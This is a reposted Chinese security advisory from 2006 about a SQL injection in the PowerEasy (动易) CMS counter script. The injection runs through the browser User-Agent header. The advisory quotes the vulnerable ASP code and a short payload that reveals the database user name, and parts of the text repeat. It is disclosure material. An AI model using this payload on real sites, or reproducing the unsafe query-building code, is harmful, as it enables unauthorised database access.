<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>
鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。
h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!
信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )
发布日期:2006-12-20 应急事件响应公告(BCTCERA0611)
受影响系统:动易网站管理系统所有版本
安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。
漏洞描述:
Count/Counter.asp文件第19行
测试方法:由于Browser限制了20个字符,除去必须有的字符和闭合,就只有13个字符(纯语句)可以利用。可以执行 MSIE’WHERE USER=0—得到当前数据库的用户名
解决方案:对于没有做好过滤的部分,进行严格的过滤以及修补工作。
关于Bug.Center.Team:
Bug.Center.Team(又名:漏洞预警中心小组)是国内较早成立的以脚本安全为主要方向的网络安全组织,致力于网络和脚本安全问题的研究,在对于脚本程序的修补、维护、漏洞检测都有专业水平,是国内最专业、最经验的安全服务组织,有关Bug.Center.Team的详情请参见: http://www.cnbct.org
<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。
h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!
信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )
发布日期:2006-12-20 应急事件响应公告(BCTCERA0611)
受影响系统:动易网站管理系统所有版本
安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。
漏洞描述:
Count/Counter.asp文件第19行
Mozilla=replace(Request.ServerVariables("HTTP_USER_AGENT"),"'","")
Mozilla=left(Mozilla,100)
Agent=Request.ServerVariables("HTTP_USER_AGENT")
Agent=Split(Agent,";")
BcType=0
If Instr(Agent(1),"U") Or Instr(Agent(1),"I") Then BcType=1
If InStr(Agent(1),"MSIE") Then BcType=2
Select Case BcType
Case 0:
Browser="其它"
System="其它"
Case 1:
Ver=Mid(Agent(0),InStr(Agent(0),"/")+1)
Ver=Mid(Ver,1,InStr(Ver," ")-1)
Browser="Netscape"&Ver
System=Mid(Agent(0),InStr(Agent(0),"(")+1)
case 2:
Browser=Agent(1)
System=Agent(2)
System=Replace(System,")","")
End Select
System=Replace(Replace(Replace(Replace(Replace(Replace(System," ",""),"Win","Windows"),"NT5.0","2000"),"NT5.1","XP"),"NT5.2","2003"),"dowsdows","dows")
Browser=Replace(Browser," ","")
System=Left(System,20)
Browser=Left(Browser,20)
我们看到Agent没有经过过滤,只用’;’分割,判断了 Agent(1)是不是包含了"MSIE"就把BcType的值设置为2,于是Browser=Agent(1) ,在后面进行了替换Browser中的空格,而且只取前20个数据,在第302调用AddNum过程:
Mozilla=left(Mozilla,100)
Agent=Request.ServerVariables("HTTP_USER_AGENT")
Agent=Split(Agent,";")
BcType=0
If Instr(Agent(1),"U") Or Instr(Agent(1),"I") Then BcType=1
If InStr(Agent(1),"MSIE") Then BcType=2
Select Case BcType
Case 0:
Browser="其它"
System="其它"
Case 1:
Ver=Mid(Agent(0),InStr(Agent(0),"/")+1)
Ver=Mid(Ver,1,InStr(Ver," ")-1)
Browser="Netscape"&Ver
System=Mid(Agent(0),InStr(Agent(0),"(")+1)
case 2:
Browser=Agent(1)
System=Agent(2)
System=Replace(System,")","")
End Select
System=Replace(Replace(Replace(Replace(Replace(Replace(System," ",""),"Win","Windows"),"NT5.0","2000"),"NT5.1","XP"),"NT5.2","2003"),"dowsdows","dows")
Browser=Replace(Browser," ","")
System=Left(System,20)
Browser=Left(Browser,20)
AddNum Browser,"PE_StatBrowser","TBrowser","TBrwNum"
343行的AddNum过程如下:
Sub AddNum(Data,TableName,CompareField,AddField)
Dim RowCount
conn_counter.execute "update "&TableName&" set ["&AddField&"]=["&AddField&"]+1 where "&CompareField&"='"&Data&"'", RowCount
If RowCount = 0 Then conn_counter.execute "insert into "&TableName&" ("&CompareField&",["&AddField&"]) values ('"&Data&"',1)"
End Sub
可以看出Data是没有经过任何过滤就放入了数据库的。于是注入成立。
Dim RowCount
conn_counter.execute "update "&TableName&" set ["&AddField&"]=["&AddField&"]+1 where "&CompareField&"='"&Data&"'", RowCount
If RowCount = 0 Then conn_counter.execute "insert into "&TableName&" ("&CompareField&",["&AddField&"]) values ('"&Data&"',1)"
End Sub
测试方法:由于Browser限制了20个字符,除去必须有的字符和闭合,就只有13个字符(纯语句)可以利用。可以执行 MSIE’WHERE USER=0—得到当前数据库的用户名
解决方案:对于没有做好过滤的部分,进行严格的过滤以及修补工作。
关于Bug.Center.Team:
Bug.Center.Team(又名:漏洞预警中心小组)是国内较早成立的以脚本安全为主要方向的网络安全组织,致力于网络和脚本安全问题的研究,在对于脚本程序的修补、维护、漏洞检测都有专业水平,是国内最专业、最经验的安全服务组织,有关Bug.Center.Team的详情请参见: http://www.cnbct.org
<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
7669
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
